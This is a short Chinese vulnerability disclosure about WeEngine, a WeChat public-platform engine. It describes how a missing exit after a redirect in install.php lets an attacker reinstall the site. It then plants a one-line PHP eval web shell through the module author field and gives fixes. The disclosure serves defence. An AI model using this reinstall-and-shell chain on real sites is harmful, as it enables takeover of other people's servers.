微擎-微信公众平台自助引擎系统整站重装+SQL注入getshell

微擎-微信公众平台自助引擎系统整站重装+SQL注入getshell

2014-08-23 21:25

http://www./源码下载，量还是挺大的。验证为v0.52，漏洞应该是版本通杀。

http://bbs./forum.php?mod=viewthread&tid=1155

在/install.php文件中26~28行代码如下：

if(file_exists(IA_ROOT . '/data/install.lock') && $action != 'finish') {

header('location: ./index.php');

}

如果满足条件，则跳转到index.php，但header并没有阻止程序继续往下执行。通过构造post包，可以实现整站重装。

http://127.0.0.1/weixin/member.php?act=login&

admin/111111进行登录，在全局设置---模块管理---模块设计中添加一个新的模块

在作者框内填写一句话木马*/eval($_POST[chopper]);/*，生成模块模板

webshell地址：

http://127.0.0.1/weixin/source/modules/test/module.php

漏洞证明：

如上

修复方案：

1.安装完后自动删除install.php文件，或满足条件处跳转后退出；

2.sql注入处正确过滤。